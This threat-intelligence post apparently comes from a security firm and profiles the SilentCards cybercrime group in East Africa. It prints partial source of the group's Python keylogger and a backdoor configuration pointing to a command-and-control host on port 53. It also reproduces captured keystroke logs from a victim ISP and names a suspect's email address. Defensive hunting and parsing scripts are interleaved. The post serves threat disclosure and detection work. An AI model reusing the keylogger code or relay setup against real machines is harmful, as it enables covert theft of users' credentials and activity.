SilentCards threat group expands across East and Central Africa, with an offshoot group born of internal rivalry.

SilentCards, a threat group OnNet tracks, is expanding its intrusions into Central Africa after gaining footholds in several banks in Uganda, Tanzania and Rwanda. The group is itself an offshoot of the former Cyber Cartel discussed in this post.

The second in command of the former Cartel group branched off and formed this group, which has since raked in the biggest share of cyber crime proceeds across East Africa. The group made off with around 2 billion Kenya shillings between 2018 and mid 2019, targeting SACCOs, banks, mobile banking service providers, ISPs, holding companies, hedge funds, betting firms and government financial departments across East Africa.

SilentCards has raked in the biggest share of the cyber crime underworld around East Africa.

More money, more problems: trouble started brewing at home.

The internal rivalry grew for a while, until one of their senior team members was arrested during a sting operation set up to uncover the insider recruitment tradecraft, after a device had been infiltrated into one of the five largest banks in East Africa.

Immediately after this, a team of five SilentCards operatives branched out and started running operations using SilentCards' TTPs, which began a long rivalry between the two gangs. This new group is currently clustered and pursued as RuiruShepherds by OnNet Threat Intelligence analysts, after several laptops they used were exploited and mapped to a safehouse at Ruiru Estate around June this year.

SilentCards was later observed expanding operations to Mozambique, Rwanda and Zambia within a span of three months.

The TTPs used by SilentCards are almost identical to the former cartel's tradecraft, the one change being that the infiltrated laptop is removed once a sustainable foothold has been gained.

During an active threat interference mission, OnNet CNO teams ran enabling activities to collect several tools used by SilentCards this year. In this post, the OnNet CTI team shares new insights on the group's current keylogger and backdoor.

The keylogger, which is derived from the infamous HailMary, was spotted active as early as January 2019, used by this threat group in the wild against two SACCOs.

The logger has been named LandCruizer keylogger by the OnNet reverse engineering team for clustering purposes. Sample (MD5 hash and file name as dropped):

0c9d3c42a53fe8398213069cdbbd1759  Java.exe

Like every other keylogger developed by SilentCards, this one stores its log data in the %userprofile% directory of the targeted user under a .tar.gz extension (the content written to it is plain text, as the write routine further down shows) and uploads the file to a DriveHQ FTP account.

import os
import time

# Python 2 source as recovered from the sample (print statements, no parentheses).
print "Time to ruuuuuuuuuuuuuuuuuuuun"
time.sleep(1)
print "Amuka"

# Fibonacci-style counting loop; it does nothing for the logger itself
parents, babies = (1, 1)
while babies < 100:
    print 'This generation has {0} babies'.format(babies)
    parents, babies = (babies, parents + babies)

#---------------------------------------------
# The log file is named after the logged-in user and dropped in %userprofile%
# with a .tar.gz extension, although only plain text is ever written to it.
LOGGED_IN=os.getenv('USERNAME')
FILE_NAME=os.getenv('userprofile')+"\\" +LOGGED_IN+".tar.gz"
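The file naming above gives defenders a cheap host-side check: the logger drops a file named after the user with a .tar.gz extension directly in the profile root, but writes plain text into it, so the file never carries the gzip magic bytes. The following Python 3 script is an added hunting example written for this post, not OnNet's tooling and not code from the sample; it assumes a profile root laid out like C:\Users (one subdirectory per user) and builds a throwaway demo tree with constructed files so that it runs offline.

```python
import gzip
import os
import tempfile

GZIP_MAGIC = b"\x1f\x8b"
# Record header string that the logger's OnKeyboardEvent writes on every focus change
LOG_MARKER = b"<Active Window:"


def classify_archive(path):
    """Return a reason string if `path` looks like a LandCruizer log, else None."""
    with open(path, "rb") as fh:
        head = fh.read(4096)
    if head[:2] == GZIP_MAGIC:
        return None  # genuine gzip stream, nothing to see
    if LOG_MARKER in head:
        return "plaintext with LandCruizer record header"
    return "named .tar.gz but not a gzip stream"


def hunt_profiles(profiles_root):
    """Walk each profile directory directly under profiles_root (C:\\Users on a
    live host) and report every .tar.gz sitting in a profile root that is not
    actually gzip. Returns a list of dicts, sorted by profile name."""
    hits = []
    for name in sorted(os.listdir(profiles_root)):
        profile = os.path.join(profiles_root, name)
        if not os.path.isdir(profile):
            continue
        for entry in sorted(os.listdir(profile)):
            if not entry.lower().endswith(".tar.gz"):
                continue
            path = os.path.join(profile, entry)
            if not os.path.isfile(path):
                continue
            reason = classify_archive(path)
            if reason:
                hits.append({
                    "path": path,
                    "profile": name,
                    # The logger uses %USERNAME%, which usually but not always
                    # equals the profile folder name.
                    "name_matches_user": entry.lower() == name.lower() + ".tar.gz",
                    "reason": reason,
                })
    return hits


def build_demo_tree():
    """Construct a throwaway profile tree (demo data, not taken from any real host)."""
    root = tempfile.mkdtemp(prefix="profiles_")
    # alice: plaintext log masquerading as an archive, in the logger's own layout
    os.makedirs(os.path.join(root, "alice"))
    with open(os.path.join(root, "alice", "alice.tar.gz"), "w") as fh:
        fh.write("\n====================================================== \n"
                 "<Active Window:  |<< Start menu>> Date <<2019-01-10 09:00:00.000000>> "
                 "HOST <<WS01 10.0.0.5: >> USER <<alice>>\n")
    # bob: a real gzip archive using the same naming convention (benign)
    os.makedirs(os.path.join(root, "bob"))
    with gzip.open(os.path.join(root, "bob", "bob.tar.gz"), "wb") as fh:
        fh.write(b"not a keylogger, just a backup")
    # carol: nothing in the profile root
    os.makedirs(os.path.join(root, "carol"))
    # dave: plaintext under a .tar.gz name but without the record header (still worth a look)
    os.makedirs(os.path.join(root, "dave"))
    with open(os.path.join(root, "dave", "notes.tar.gz"), "w") as fh:
        fh.write("just some text\n")
    return root


if __name__ == "__main__":
    for hit in hunt_profiles(build_demo_tree()):
        print(hit)
```

On a live host, point hunt_profiles at C:\Users. The check scans every .tar.gz in a profile root rather than only the exact user-named file, because the logger names the file after the USERNAME environment variable, which does not always match the profile folder name; name_matches_user records whether the two agree so that an exact match can be prioritised.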

Its OnKeyboardEvent definition matches the HailMary keylogger used widely by Grapzone and other advanced financial threat actors across East Africa.

import win32gui   # pywin32; the keyboard hook that calls OnKeyboardEvent is not part of this excerpt

# LOG_ACTIVE, LOG_TEXT, MAIL_SENT, COMPUTER_NAME and now are module globals set elsewhere in the
# sample; FILE_NAME and LOGGED_IN come from the fragment above.
def OnKeyboardEvent(event):
    global LOG_NEWACTIVE, LOG_ACTIVE, LOG_TEXT,MAIL_SENT
    LOG_NEWACTIVE=''
    wg=win32gui
    # Title of the window that currently has focus
    LOG_NEWACTIVE = wg.GetWindowText (wg.GetForegroundWindow())
    if LOG_NEWACTIVE != LOG_ACTIVE:
        #----------
        LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
        LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
        #-----------
        LOG_ACTIVE = LOG_NEWACTIVE
        print LOG_NEWACTIVE
#-----------------------
        # Every focus change appends a new record header to the plain-text "archive" in %userprofile%
        f = open(FILE_NAME, 'a') # or 'w'?
        f.write("\n====================================================== \n")
        f.write("<Active Window: "+ " |<< "+event.WindowName+">> Date <<"+str(now)+">> HOST <<"+COMPUTER_NAME+ ">> USER <<"+ LOGGED_IN+'>>\n')
        f.write("\n------------------------------------------------------------------------------------------------------------------------ \n")
        f.close()
#-----------------------
#-----------------------

The keylogger's entry point is as below:

if __name__ == '__main__':
    """If this script is run as stand alone then call main() function."""
    main("land_cruiser")
    print "Threads running"

After the recruited insider has been coached and has successfully implanted the rogue laptop into the target infrastructure, SilentCards' operators swing into action through TeamViewer as a remote access tool and begin deploying GoToMyPC across machines penetrated in the internal infrastructure until they reach their objective.

Another backdoor in use is a tool derived from the Aeshell backdoor, called SeaDuke. This toolkit is deployed internally, inside the targeted infrastructure, with the machine it is implanted on acting as a hop relay that forwards collected screenshots to a controlled C2 via No-IP dynamic DNS, into NATed servers hosted in safehouses around Nairobi. The SeaDuke PE samples collected by OnNet Threat Intelligence analysts over the last few months map to kitho.myftp.org, which is registered to a user with the Gmail account kitho.koome@gmail.com. This same account has been used in several heists to register GoToMyPC backdoors on an annually paid subscription, funded from a VISA card on a bank account registered in Nakuru. The Gmail account also matches up with other email accounts that show use of a VISA card managed by the spouse of a SilentCards leader.

# server config
HOST = 'kitho.myftp.org'   # No-IP dynamic DNS name, resolved at run time to the NATed relay
PORT = 53                  # port 53; non-DNS traffic on the DNS port is easily missed by permissive egress filters

# session controller
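The relay config points the implant at a No-IP dynamic DNS name over port 53, where its sessions can blend with DNS on a permissive egress filter. The following Python 3 triage routine is an added example written for this post, not OnNet's tooling and not code from the SeaDuke sample. It assumes flow records that carry the destination name, port, transport and the first bytes of payload (as a sensor or Zeek-style connection log might provide), and it flags destinations under No-IP suffixes and port-53 sessions whose payload does not parse as a DNS message. The sample flows are constructed for the demo; only the kitho.myftp.org name comes from the page.

```python
import struct

# Dynamic DNS suffixes operated by No-IP; kitho.myftp.org falls under the first one.
DYNDNS_SUFFIXES = ("myftp.org", "no-ip.org", "no-ip.biz", "ddns.net", "hopto.org", "zapto.org")


def looks_like_dns(payload, tcp):
    """Cheap structural check: does this payload parse as a DNS message?
    DNS over TCP carries a 2-byte length prefix; DNS over UDP does not."""
    if tcp:
        if len(payload) < 2:
            return False
        (length,) = struct.unpack("!H", payload[:2])
        payload = payload[2:2 + length]
        if len(payload) != length:
            return False
    if len(payload) < 12:
        return False
    _id, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF
    if opcode > 5 or qdcount == 0 or qdcount > 16:
        return False
    # Walk the first QNAME: a run of <len><label> pairs terminated by a zero byte.
    pos = 12
    while True:
        if pos >= len(payload):
            return False
        label_len = payload[pos]
        if label_len == 0:
            pos += 1
            break
        if label_len > 63:  # labels are at most 63 bytes; this also rejects compression pointers
            return False
        pos += 1 + label_len
    return pos + 4 <= len(payload)  # QTYPE and QCLASS must follow the name


def dyndns_suffix(host):
    """Return the matching No-IP suffix for host, or None."""
    host = host.lower().rstrip(".")
    for suffix in DYNDNS_SUFFIXES:
        if host == suffix or host.endswith("." + suffix):
            return suffix
    return None


def triage_flows(flows):
    """Return (flow, [reasons]) for every flow worth an analyst's attention."""
    findings = []
    for flow in flows:
        reasons = []
        suffix = dyndns_suffix(flow["dst"])
        if suffix:
            reasons.append("destination under dynamic-DNS domain %s" % suffix)
        if flow["port"] == 53 and not looks_like_dns(flow["payload"], flow["proto"] == "tcp"):
            reasons.append("port 53 traffic that is not DNS")
        if reasons:
            findings.append((flow, reasons))
    return findings


# Constructed sample flows (not captured traffic). A valid A query for example.com
# is built by hand so the check has a genuine DNS message to accept.
_DNS_QUERY = (struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
              + b"\x07example\x03com\x00" + struct.pack("!HH", 1, 1))
SAMPLE_FLOWS = [
    {"dst": "resolver.corp.example", "port": 53, "proto": "udp", "payload": _DNS_QUERY},
    {"dst": "resolver.corp.example", "port": 53, "proto": "tcp",
     "payload": struct.pack("!H", len(_DNS_QUERY)) + _DNS_QUERY},
    {"dst": "kitho.myftp.org", "port": 53, "proto": "tcp",
     "payload": b"SCREEN\x00\x01\x89PNG\r\n\x1a\n"},
    {"dst": "update.vendor.example", "port": 443, "proto": "tcp", "payload": b"\x16\x03\x01\x00\xa5"},
]

if __name__ == "__main__":
    for flow, reasons in triage_flows(SAMPLE_FLOWS):
        print(flow["dst"], flow["port"], "; ".join(reasons))
```

The DNS check is deliberately structural rather than a full parser: it rejects the obvious non-DNS sessions on port 53 without trusting the port, and the dynamic DNS check works on the resolved name rather than the IP, since the whole point of No-IP for the actor is that the address behind kitho.myftp.org can change.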

In some of the keylogger data collected from their servers after June 2019, the actors showed much more interest in holding companies, intellectual property/advertising companies and Internet service providers. The keylogger data below shows information collected against an Internet service provider in mid 2018, which progressed to more attacks in 2019.

<Active Window:  |<< Pesapal Support - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
====================================================== 
<Active Window:  |<< Start menu>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
====================================================== 
<Active Window:  |<< Zuku Online Payment - Administration - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
====================================================== 
<Active Window:  |<< Subscribers 
 Wananchi CRM - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
0 [ENT]
====================================================== 
<Active Window:  |<< 0 
 Subscribers 
 Wananchi CRM - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
MUTE CALL....SYSTEM ISSUE, HAH
RRY, 19
27/6
====================================================== 
<Active Window:  |<< Start menu>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
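Recovered LandCruizer logs are worth parsing rather than reading by eye, since every focus change writes one record (header line, dashed separator, then whatever was typed while that window had focus), and the interesting windows are easy to miss in a long capture. The parser below is an added example written for this post, not OnNet's tooling; it runs on a constructed sample in the same layout as the excerpt above and assumes the timestamp is Python's str(datetime) form, which drops the fractional seconds when they are zero.

```python
import re
from datetime import datetime

# One record header as written by the logger's OnKeyboardEvent. The window title may
# span lines, so the title group is matched with DOTALL and whitespace-normalised later.
HEADER_RE = re.compile(
    r"<Active Window:\s*\|<<(?P<title>.*?)>> Date <<(?P<date>[^>]*)>> "
    r"HOST <<(?P<host>[^>]*)>> USER <<(?P<user>[^>]*)>>",
    re.DOTALL,
)
RECORD_SEP_RE = re.compile(r"^=+[ \t]*$", re.MULTILINE)   # line written before each header
DASH_SEP_RE = re.compile(r"^-+[ \t]*$", re.MULTILINE)     # line written after each header


def _parse_ts(text):
    """str(datetime.now()) omits the .%f part when microseconds are zero."""
    for fmt in ("%Y-%m-%d %H:%M:%S.%f", "%Y-%m-%d %H:%M:%S"):
        try:
            return datetime.strptime(text.strip(), fmt)
        except ValueError:
            continue
    return None


def parse_landcruizer_log(text):
    """Split a LandCruizer log into records: title, ts, hostname, ip, user, keys."""
    records = []
    for chunk in RECORD_SEP_RE.split(text):
        m = HEADER_RE.search(chunk)
        if not m:
            continue
        title = " ".join(m.group("title").split())
        # HOST field looks like "DCM-7503-002-PC 10.6.0.177: "
        host_parts = m.group("host").strip().rstrip(":").split()
        hostname = host_parts[0] if host_parts else ""
        ip = host_parts[1] if len(host_parts) > 1 else ""
        # Everything after the dashed separator, up to the next record, is keystroke data
        rest = DASH_SEP_RE.sub("", chunk[m.end():], count=1)
        records.append({
            "title": title,
            "ts": _parse_ts(m.group("date")),
            "hostname": hostname,
            "ip": ip,
            "user": m.group("user").strip(),
            "keys": rest.strip(),
        })
    return records


def flag_sensitive(records, keywords=("payment", "crm", "bank", "admin")):
    """Records whose window title suggests a payment, CRM or admin application."""
    return [r for r in records if any(k in r["title"].lower() for k in keywords)]


# Constructed sample in the logger's layout (demo data, not a real capture).
SAMPLE_LOG = """
====================================================== 
<Active Window:  |<< Start menu>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
====================================================== 
<Active Window:  |<< Zuku Online Payment - Administration - Mozilla Firefox>> Date <<2018-06-27 07:25:02.284000>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
0 [ENT]
====================================================== 
<Active Window:  |<< Subscribers 
 Wananchi CRM - Mozilla Firefox>> Date <<2018-06-27 07:25:02>> HOST <<DCM-7503-002-PC 10.6.0.177: >> USER <<DCM-7503-002>>
------------------------------------------------------------------------------------------------------------------------ 
MUTE CALL....SYSTEM ISSUE
27/6
"""

if __name__ == "__main__":
    for rec in flag_sensitive(parse_landcruizer_log(SAMPLE_LOG)):
        print(rec["ts"], rec["user"] + "@" + rec["hostname"], rec["title"], repr(rec["keys"]))
```

The keystroke text is kept raw (the logger's own [ENT] markers included) so that an analyst can see exactly what was typed into a flagged window; the keyword list in flag_sensitive is a starting point to be tuned per victim.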

SilentCards has managed to gain access to several small to medium enterprises, stealing small chunks of money in separate heists over the course of a month; this adds up to double what the other threat groups manage to cash out over the same estimated timeline, making this group the biggest earner in cyber crime across Eastern and Central Africa.

Speed is everything

This group has weaker operational security (OPSEC) than any other group we have observed.

Speed is everything when countering the SilentCards threat group.

Speed of eviction is essential, ideally before the hidden laptop goes online: once the rogue device has been brought in and has become operational, removing their foothold is a gamble even after the laptop is unplugged. CTI-led incident response against this group's intrusions helps protect the customer's business operations and informs business decisions during eradication and eviction of the adversary.

Attribution matters. Cyber activity is still subject to the laws of science: it is a signal, and a signal can be intercepted, observed and tracked to its origin.
